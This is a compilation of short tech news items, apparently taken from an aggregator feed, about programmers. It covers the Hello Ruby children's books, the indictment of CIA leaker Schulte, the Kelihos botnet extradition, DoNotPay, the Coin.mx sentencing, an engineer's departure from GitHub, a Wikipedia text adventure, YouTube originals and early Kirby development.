As it turns out, money can buy happiness, just not in the ways you might think. This is “More of What You Love,” a collaboration between OZY and Ally Financial to highlight the people who are not only doing good business, but doing what they love and finding innovative ways to fund their passion projects.

Linda Liukas became a children’s book innovator almost by accident. While learning programming, which she found dry and jargon-y, she found herself doodling, and what soon emerged was a small girl named Ruby who imagined explanations for the different programming concepts that made them both understandable and fun.

Those doodles became blog posts, which became a blockbuster Kickstarter, which became a children’s book series called Hello Ruby…which became a new hybrid career for Liukas.

“When I was growing up, I wished there was a book like Ruby that showed a more whimsical and creative side of technology,” says Liukas. “There wasn’t, so I needed to create that book.”

Maybe the biggest risk is that you don’t take risks, and don’t develop.

Her huge success with crowdfunding was the impetus she needed to actually produce the book, which meant learning about the publishing industry and how to budget her projects, breaking big problems into smaller pieces and attacking each one individually.

While Liukas says her initial image of an entrepreneur was of an adrenaline-driven risk-taker, launching her own business has taught her that the word can encompass much more. ”Maybe the biggest risk,” she says, “is that you don’t take risks, and don’t develop.”

For her, the chance to make kids feel like the world of technology is welcoming and creative is a risk well worth taking.

Former CIA and NSA agent Joshua Adam Schulte has been charged with stealing data from the CIA and handing it over to an unnamed organization specializing in public disclosures of such sensitive info. The indictment, filed by the US Attorney’s Office on Monday, says that Schulte had been charged with 13 counts of illegal gathering and with leaking “classified national defense information” from the agency. Although the outside organization is not identified in the indictment, Schulte is believed to have supplied WikiLeaks with the cache of top-secret CIA intelligence that the whistle-blowing site released in March of last year. Schulte was arrested in August and has been held in custody ever since, on charges relating to possession of child pornography.

Russian programmer Pyotr Levashov, accused by US prosecutors of being the mastermind behind a large bot net has been extradited to the US from Spain and will appear in court Friday.

In a statement Friday, the US Justice Department said Levashov is “alleged to have controlled and operated the Kelihos botnet which was used to distribute hundreds of millions of fraudulent e-mails per year; intercept credentials to online and financial accounts belonging to thousands of Americans; and spread ransomware throughout our networks.” The suspected hacker is expected to appear before a US Magistrates Court in Connecticut Friday evening.

Levashov had previously said his life would be in danger if Spanish authorities complied with the US extradition request, and afraid that he might face torture in the US “in order to extract Russian secrets.”

The programmer is also wanted in Russia on cyber-crime charges, including hacking the site of a medical facility in St. Petersburg and spreading malware. Moscow issued an international warrant for his arrest in August.

  • A programmer built a chatbot to act as an AI lawyer to fight parking tickets.
  • The company is planning to launch the platform to let you sue anyone.

As a young programmer, Joshua Browder built a chatbot to act as a kind of AI lawyer that would help people dispute parking tickets. Not only did it work, but it was hugely popular, which led Browder to expand the program to help anyone harmed by the Equifax scandal sue the company in small claims court.

Now his company, DoNotPay, is aiming even higher:  by the end of this year, Browder plans to launch an addition to the platform that will you let you sue anyone.

“To be honest, Equifax was just a bit of testing for the product that would let anyone sue anyone,” Browder, one of 2017’s 35 Innovators under 35, said Wednesday at MIT Technology Review’s EmTech MIT conference. “The main use would be for taking down corporations.”

Wherever corporate malfeasance hurts regular people, Browder envisions DoNotPay’s platform coming to the rescue by allowing users to print out documents that they can take to small claims court instead of relying on class action suits and spending years in the appeals process.

“The corporations will just settle and say, ‘We will give you $ 1,000 if this goes away,’” Browder said. “Which is great, because it means they actually get punished for doing wrong.”

In addition to the Equifax test, Browder has been testing the software for individual disputes—like fighting your landlord. Next on his agenda? Automating the divorce process.

As for the pitfalls of such a system (everyone suing everyone—what could go wrong?), Browder’s biggest worry is that if his platform is as popular as its earlier iterations have been, the flood of lawsuits could swamp the legal system. Spurious lawsuits should be avoidable, he says, by building requirements into the program to weed them out.

“I think triaging people to make sure they do have a valid claim is important,” he said. “I don’t want it to just be filling in anything. It has to have a specific reason and match you to that.”

DoNotPay will also make it easy to use the platform repeatedly. If you input your name and address when you use the site for a parking ticket, Browder said, it will remember your information for the next time you use the platform to sue a large corporation.

“Traditionally, the powerful have used the legal system to intimidate people,” he said. “But similarly, everyone—normal people—could use the legal system to intimidate corporations.”

  • A Florida software engineer was sentenced to 16 months in prison on Friday.
  • He was found guilty of scheming to help an illegal bitcoin exchange avoid having banks and regulators look into its activities.

Yuri Lebedev was sentenced by U.S. District Judge Alison Nathan in Manhattan to 16 months in prison on Friday, according to Nicholas Biase, a spokesman for federal prosecutors.

The bitcoin exchange involved in the case, Coin.mx, was linked to an investigation of a data breach at JPMorgan Chase & Co, revealed in 2014, that exposed more than 83 million accounts.

“We are dismayed that Mr. Lebedev has been sentenced to prison,” Lebedev’s lawyer, Eric Creizman, said in an email. Federal sentencing guidelines called for up to 97 months.

Lebedev was convicted in March along with Trevon Gross, a New Jersey pastor.

Prosecutors charged that Lebedev helped arrange bribes to Gross, including $ 150,000 in donations to his church. In exchange, they said, Gross helped the operator of Coin.mx, Anthony Murgio, take over a small credit union Gross ran from his church.

Murgio used the credit union to evade scrutiny of banks wary of processing payments involving the virtual currency, prosecutors said. Lebedev was accused of working for Coin.mx through a front called “Collectables Club.”

Gross is scheduled to be sentenced later this month. Murgio pleaded guilty in January, and was sentenced to five-and-a-half years in prison in June.

The trial followed a probe rooted in the JPMorgan data breach, which lead to charges against nine people.

Gross, Lebedev and Murgio were not accused of hacking, but prosecutors said Coin.mx was owned by an Israeli, Gary Shalon, who was behind the JPMorgan hack.

Prosecutors have said that Shalon, together with Maryland-born Joshua Samuel Aaron, orchestrated cyber attacks that resulted in the theft of information from more than 100 million people.

Prosecutors said they carried out the hacks to further other schemes with another Israeli, Ziv Orenstein, including pumping up stock prices with promotional emails.

Shalon, Aaron and Orenstein pleaded not guilty to criminal charges.

A GitHub programmer turned down a severance check so she could speak out about her frustrating experience https://briefnews.eu/a-github-programmer-turned-down-a-severance-check-so-she-could-speak-out-about-her-frustrating-experience/ https://briefnews.eu/a-github-programmer-turned-down-a-severance-check-so-she-could-speak-out-about-her-frustrating-experience/#respond Thu, 06 Jul 2017 21:58:04 +0000 http://briefnews.eu/a-github-programmer-turned-down-a-severance-check-so-she-could-speak-out-about-her-frustrating-experience/ Coraline Ada EhmkeCoraline Ada Ehmke

A month ago, well-known programmer Coraline Ada Ehmke was fired from her job at GitHub.

When it happened, she knew she was going to want to publicly speak out about her frustrating time at the company, so she did something that people rarely do: she turned down the company’s severance package. To get the money, she would have had to sign a non-disparagement non-disclosure agreement, she told Business Insider.

She found another job and a few weeks after that, after getting the OK from her current employer, she wrote a tell-all of her year at GitHub.

“I was very privileged in this case. I have a good support network, so people who care about me and support my work actually put up the money I would have gotten in severance to make sure I had enough to live on and still had the opportunity to tell my story,” Ehmke told Business Insider.

Outspoken and reprimanded

Ehmke isn’t alleging that she experienced sexual harassment, discrimination, or anything else illegal. She blames “inexperienced management” and a rough corporate culture for a frustrating year there.

GitHub interns employeesGitHub/GlassdoorAs a trans woman in tech, Ehmke made a name for herself by speaking out about inclusion, writing community conduct codes to promote diversity, and other such work. She’s also been known to cause a hubbub in the open source community with her outspoken ways.

GitHub hired Ehmke in 2015 knowing she was a rabble rouser for causes of diversity and, Ehmke says, they wanted her because of that. She says her GitHub managers “constantly praised” her for her productivity but also constantly told her that she was being too abrasive. Although she was a senior engineer, Ehmke says her manager put her on weekly 1:1 meetings and reviewed “all of my written communication.”

She thought she was improving in that area and achieving other goals that put her on track for a promotion. But instead she got a bad review, was put on a “performance improvement plan,” and fired shortly after.

Of course, there are two sides to every story, and not every hire at every company works out. GitHub won’t tell its side because it has a policy against commenting on HR matters. “As a matter of company policy, we don’t comment on personnel issues. At GitHub, we have worked hard to build a diverse and inclusive culture and are committed to these values at every level of the company,” a spokesperson told Business Insider.

Still, Ehmke’s written account of her issues at the company sounds a lot like the kind of issue that Facebook COO and feminist Sheryl Sandberg has been warning about since her “Lean In” book published in 2013. Sandberg’s premise is that women who are cheered for delivering results are also often reprimanded for being too aggressive, difficult, or abrasive in ways that men are not.

The dangers of speaking out

Today, more women in tech are speaking out about the sexism, sexual harassment, discrimination, and even sexual assault they’ve experienced in their careers. And powerful people are losing their jobs as a result.

GitHub co-founder Chris WanstrathFlickr/by DaveFayramBut this experience at GitHub left Ehmke thinking that no real progress is being made.

GitHub’s big sexual harassment scandal was back in 2014, when a female programmer made allegations. GitHub always denied those allegations but ultimately the founder CEO resigned. It has been working hard on its reputation ever since.

“Here was a company that, from an outside perspective, seemed to be taking culture change more seriously. They’ve hired some really good people to turn things around,” Ehmke says. “I’m not seeing systematic change. Maybe it’s too early for me to be hopeful. Maybe the wounds are still too fresh.”

Still, she believes that what’s needed for real change to happen in Silicon Valley is for more people like her, in a position to shun the “hush money,” to tell their stories.

“We need more women and marginalized people to speak up if it’s safe for them to do so,” she says.

And it’s not really safe. Women who speak out are subject to everything from threats to “doxing,” where hackers publish personal identifying information about a person and make them even bigger targets.

“Speaking out is a risk and I don’t know how safe I am. That’s why I waited until I got a new job before I wrote,” she said.

“I’ve been doxed before, I’ve been threatened before. I’ve had horrible experiences. But I’m in a position that I can handle that because I’m older, I’m well established in my career, and I have a good support network. So it’s up to people like me to take that abuse and to speak out because other people can’t,” she said.

A programmer turned Wikipedia into a classic text adventure https://briefnews.eu/a-programmer-turned-wikipedia-into-a-classic-text-adventure/ https://briefnews.eu/a-programmer-turned-wikipedia-into-a-classic-text-adventure/#respond Sun, 02 Jul 2017 23:20:13 +0000 http://briefnews.eu/a-programmer-turned-wikipedia-into-a-classic-text-adventure/

Wikipedia as a classic text adventure: this “game” now exists, and it’s thanks to a London developer who figured out a clever way to interpret the gushing fountain of data that is Wikipedia’s API.

The Javascript project works on any desktop or mobile web browser, and it starts out looking like an ’80s Infocom video game box. (Always a good beginning.) Wikipedia: The Text Adventure generates a list of major landmarks, and clicking any of them takes you to a landing page with a basic location description as pulled from its Wikipedia article summary, along with a list of nearby locations marked off by cardinal directions. You’re restricted to a text box, and, appropriately, typing “help” into it brings up a list of commands you can type. (Mobile users can also tap on keywords in the summaries, which isn’t as cool, but it’s a welcome alternative.)

YouTube is trying to make a tricky pivot from platform to programmer (GOOG) https://briefnews.eu/youtube-is-trying-to-make-a-tricky-pivot-from-platform-to-programmer-goog/ https://briefnews.eu/youtube-is-trying-to-make-a-tricky-pivot-from-platform-to-programmer-goog/#respond Tue, 20 Jun 2017 08:03:54 +0000 http://briefnews.eu/youtube-is-trying-to-make-a-tricky-pivot-from-platform-to-programmer-goog/ Susanne DanielsGetty / Frederick M Brown

YouTube has to start acting less like a tech platform and more like a TV network.

The company has long served as the repository for every possible video on the planet, professional or otherwise. But given that the Alphabet-owned video site is making another push into original programming, it is looking to become an outlet where some people will seek out favorite shows with regularity.

In other words, YouTube needs to shift slightly from having its algorithm find things you might want to watch to YouTube telling you what you should watch.

That’s the delicate dance YouTube originals head Susanne Daniels needs to master as she pushes a slate of seven original YouTube series designed both to capture big audiences and also serve as safe havens for advertisers at a moment where that’s suddenly paramount for the video outlet.

Among the shows announced in May are a behind the scenes look at Ellen Degeneres’ talk show, a music cover competition series hosted by Ryan Seacrest, as well as a pair of scripted series due later this year.

It won’t necessarily be easy. During a keynote session at the Cannes advertising festival on Monday, Daniels — who jumped from MTV in 2015 to become YouTube’s programming chief — noted that YouTube generates 1 billion hours of viewing a day. Thus, any new video series has the potential to be just another video on YouTube.

Case in point. Daniels was joined on stage with actress/music artist Demi Lovato, who talked about her new YouTube original show (while also discussing how she’s struggling to come to terms with turning 25). Lovato boasts of 10 million YouTube subscribers, and during the keynote interview was recognized for crossing the 1 billion view barrier.

So it’s fair to ask, how is any new Lovato video going to stand out amongst a sea of Lovato videos? The same can be said for Degeneres, who boasts of a huge YouTube following, as well as the home-grown YouTube stars Rhett and Link — who are also working on a YouTube original.

Daniels said YouTube has some unique advantages to make sure its shows get noticed, such as Google’s powerful tech and data, that most networks don’t enjoy.

“I don’t find the fact that YouTube has so much [user-generated] content or programming that much of a challenge more than I consider the current landscape of programming a challenge in and of itself,” she said during a post-keynote interview with reporters.

“I’ve been doing this for a long time and there’s never been this many scripted shows or unscripted shows out there available. There’s never been this many choices for the viewer. So yes, we’re up against 500 scripted shows … and we’re up against our own UGC content. But I think there’s a way with good marketing and using the strength of YouTube and the platform to attract viewership.”

Daniels pointed to a recent 96-hour programming marathon hosted by the pop star Katy Perry, which reached 49 million people across the globe. Perry and YouTube only let fans know about the variety event at the last minute. And YouTube was able to surface those videos to Perry’s fans via its data, algorithm, and a promotional push.

“There’s a tendency to think of YouTube as this giant pool where everything is competing with everything else, but that’s not really how it works,” said Kevin Allocca, YouTube’s head of culture. Most YouTube stars post videos on the same day or time consistently, so regular YouTube viewers are ready to seek content out, he said.

“Videos go viral every day,” Daniels added.

For some originals, YouTube will rely on its data and recommendation engine, which benefits from 80 billion “signals” from viewers passively indicating what they are interested in based on what they click on. But in other cases, the plan is to promote shows using more traditional channels, like TV ads, ads prior to movies, and other conventional marketing.

Daniels is hoping for a drama series to become an anchor for her slate of originals.

“There is something about the prestige of a drama that is harder to market to than a comedy,” she said. YouTube’s coming scripted shows include the dance-themed “Step Up” and “Impulse,” a sci fi vehicle being produced for the YouTube Red subscription service by Doug Liman of the “Bourne Identity” franchise

“Both have potential to break out,” said Daniels.”I think we are going to do different kind of marketing [for those shows],” she said.

Among other topics raised during the Cannes sit down:

  • The collection of ad-supported original series YouTube is planning this year were already in the works before YouTube found itself in hot water with marketers, whose ads were spotted alongside hate videos. The fact that those shows were greenlit, “wasn’t a reaction to that,” said Daniels. “But the good news is they provide an opportunity for advertisers to have a safe environment.”
  • Daniels is planning to ramp up the company’s original output for 2018, and hopes that half of the shows come from YouTube talent and half from outside studios. “Creators want their content to reach a big audience,” said Daniels.

Any programmer of a certain age likely has a horror story about some rinky-dink coding and workflow environment that forced them to hack together a working app under extreme hardware and software constraints. Still, we’re pretty sure none of those stories can beat the keyboard-free coding environment that Masahiro Sakurai apparently used to create the first Kirby’s Dream Land.

The tidbit comes from a talk Sakurai gave ahead of a Japanese orchestral performance celebrating the 25th anniversary of the original Game Boy release of Kirby’s Dream Land in 1992. As reported by Game Watch (and wonderfully translated by the Patreon-supported Source Gaming), Sakurai recalled how HAL Laboratory was using a Twin Famicom as a development kit at the time. Trying to program on the hardware, which combined a cartridge-based Famicom and the disk-based Famicom Disk System, was “like using a lunchbox to make lunch,” Sakurai said.

As if the limited power wasn’t bad enough, Sakurai revealed that the Twin Famicom testbed they were using “didn’t even have keyboard support, meaning values had to be input using a trackball and an on-screen keyboard.” Those kinds of visual programming languages may be fashionable now, but having a physical keyboard to type in values or edit instructions would have probably still been welcome back in the early ’90s.
